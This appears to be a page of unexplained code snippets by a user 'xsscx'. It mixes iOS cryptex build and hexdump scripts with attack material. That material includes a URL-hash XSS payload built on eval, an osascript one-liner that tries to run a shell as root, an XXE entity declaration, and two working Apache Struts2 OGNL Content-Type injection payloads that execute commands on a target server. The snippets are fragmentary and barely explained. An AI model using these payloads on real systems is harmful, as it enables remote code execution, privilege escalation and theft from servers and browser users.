xsscx

#!/bin/sh
hexdump -n 4 com.example.cryptex.dstroot/usr/bin/hello
hexdump -n 4 com.example.cryptex.dstroot/usr/bin/toybox
hexdump -n 4 com.example.cryptex.dstroot/usr/bin/simple-shell
hexdump -n 4 com.example.cryptex.dstroot/usr/bin/simple-server
hexdump -n 4 com.example.cryptex.dstroot/usr/bin/nvram
hexdump -n 4 com.example.cryptex.dstroot/usr/bin/debugserver
hexdump -n 4 com.example.cryptex.dstroot/usr/bin/cryptex-run
hexdump -n 4 com.example.cryptex.dstroot/usr/bin/frida-server
hexdump -n 4 com.example.cryptex.dstroot/usr/bin/libclang_rt.ubsan_ios_dynamic.dylib

xsscx

#!/bin/sh
echo "unmounting com.example.cryptex"
cryptexctl uninstall com.example.cryptex
echo "Start the Build"
cp src/hello/Makefile.dist src/hello/Makefile
make clean
make all
echo "Start of entitlement checks..... for example-cryptex with debugserver and latest entitlements from PR48 + PR49....."
rm /private/tmp/*.xml
echo "Check the entitlements in the src/"

xsscx

console.log(location.hash);
var tabValue = document.URL;
window.location = tabValue.substring(0, tabValue.lastIndexOf("#"));
console.log(location.hash);
window.location.hash = `#<noscript><script>console.log(document.location)&k7="><svg/t='&k8='onload='/&k9=/+eval(t)'`
location.reload();
console.log(location.hash);

xsscx

/usr/bin/osascript -e 'do shell script "whoami" user name "root" password "" with administrator privileges'

xsscx

<!DOCTYPE roottag [
 <!ENTITY windowsfile SYSTEM ".">
]>
<roottag>
 <sometag>&windowsfile;</sometag>
</roottag>

xsscx

#!/usr/bin/python
# -*- coding: utf-8 -*-
 
import urllib2
import urllib3
import requests
import httplib
import logging

from requests.packages.urllib3.exceptions import InsecureRequestWarning

xsscx

import requests

requests.get("https://target.action", headers={"Connection": "close", "Accept": "*/*", "User-Agent": "Mozilla/5.0 ", "Content-Type": "%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"})

xsscx

curl -i -s -k  -X $'GET' \
    -H $'User-Agent: Mozilla/5.0' -H $'Content-Type: %{(#_=\'multipart/form-data\').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[\'com.opensymphony.xwork2.ActionContext.container\']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=\'ls -lat /\').(#iswin=(@java.lang.System@getProperty(\'os.name\').toLowerCase().contains(\'win\'))).(#cmds=(#iswin?{\'cmd.exe\',\'/c\',#cmd}:{\'/bin/bash\',\'-c\',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}' \
    $'https://target'

xsscx

https://iecvlist.microsoft.com/IE10/1152921505002013023/iecompatviewlist.xml

xsscx

['onhashchange', 'onhashchange'].forEach(function (evName) {
    window.addEventListener(evName, function () {
        debugger; // Chance to check everything right before the redirect occurs
    });
});